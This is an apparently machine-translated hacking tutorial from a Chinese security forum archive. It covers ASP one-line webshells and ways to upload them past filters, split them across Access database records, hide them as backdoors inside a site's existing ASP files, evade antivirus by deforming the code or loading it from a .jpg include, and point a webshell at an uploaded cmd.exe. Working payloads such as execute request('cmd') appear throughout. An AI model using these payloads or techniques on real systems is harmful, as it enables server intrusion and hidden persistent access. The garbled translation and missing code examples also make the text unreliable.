The word Trojan-free kill process-vulnerability warning-the black bar safety net

ID MYHACK58:62201026499
Type myhack58
Reporter 佚名
Modified 2010-03-21T00:00:00



In a further invasion of the server,the uploaded file will be the server to filter out,we upload WEBSHLL cannot run!

To blue screen the most small ASP Trojan, for example. Be modified as follows.

The original code is<%execute request("cmd")%> tag to modify the replacement down to

<scriptlanguage=VBScript runat=server>execute request("cmd")</Script> so you avoid the<%,%>symbols!

The table in the data segment limit, in a word the Trojan also writes not the case

The network spread of the smallest of the Trojan code is<%eval request("#")%> if even this also write down how to do?

The Trojan is written separately! <%Y=request("x")%> <%execute(Y)%> such written separately submitted to the database no problem!

However, in the ACCESS database, the newly added data physical location is in the old data before, so be the first to write<%execute(Y)%>section. Written after the client write the password in addition to fill in"x"other than any of the characters can be, if you fill the"x"it will go wrong!

Insert the phrase easy to proof wrong

For example

Sub unlockPost()

Dim id,replyid,rs,posttable



If Not IsNumeric(id) or id="" Then


Sub unlockPost(<%eval request("#")%>)

Dim id,replyid,rs,posttable



If Not IsNumeric(id) or id="" Then

Can be, can also be written as with a fault-tolerant statement format!!

<%if request("cmd")<>""then execute request("cmd")%>

The word Trojan to two words Trojan horse transformation!

The word Trojan service end of the prototype:<%execute request("value")%> ,

After modification:<%On Error Resume Next execute request("value")%> ,

As for why use two words Trojan horse,is due to that our back door is more covert.

I also tried with a word inserted into the WellShell a ASP file inside,but access is often error-prone,and insertion of two words Trojan service end but can be a normal visit,to the site page without any effects.

This will achieve a concealment of a stronger purpose,he the administrator will not always be connected to your web page files are deleted.

Now my WellShell has such a back door. Select To insert a sentence or two Trojan to the ASP file you want to notice that some can use IE to access the ASP file,not conn. asp this file to insert.

Of course,connecting two words if the client is still with the phrase Trojans in the client,without modification.

Wordfree kill: the

A: modification of the law

For example: eval(request("#"))so the horse does, the General case is not to be killed. But in fact, often the antivirus software will put the eval(request listed as feature codes. So we deformed a bit



This can be achievedfree killpurposes.

For example:<%execute request("1")%> after deformation: the


execute E%>

Of course, this deformation is best to do.

Describes the second method: because many of the administrators are very smart, it will check that the ASP file in the execute and eval function. So, no matter how you decompile, it will eventually always want to use one function to explain the operation, so it is still to be found. Okay, we use an external file to call. Built a a. jpg or any not be found the file suffix or file name. Write execute(request("#"))of course, you can be the first after the deformation is now put up. Then in the ASP file to insert

<!--# include file="a.jpg" -->

To reference it, you can.

However, the administrator may by comparing the file way to find modified files, but this case is not much.

In WEBSHALL using command prompt

In the use of the ASP webmaster assistant 6. 0 click the command prompt shows“no permissions”when you can use the ASP webmaster Assistant to upload the CMD. exe to your WEBSHELL directory, other directories also, the upload after the CMD. exe absolute path of the COPY out, and then modify your WEBSHELL find the call to CMD. EXE code. The original code is as follows

. exec("cmd.exe /c "&DefCmd). stdout. readall

Modified to

. exec("do you want to upload the cmd. exe absolute path" /c"&DefCmd). stdout. readall

For example, your upload to directory is D:\web\www\cmd.exe,then it is modified to

. exec("D:\web\www\cmd.exe /c"&DefCmd). stdout. readall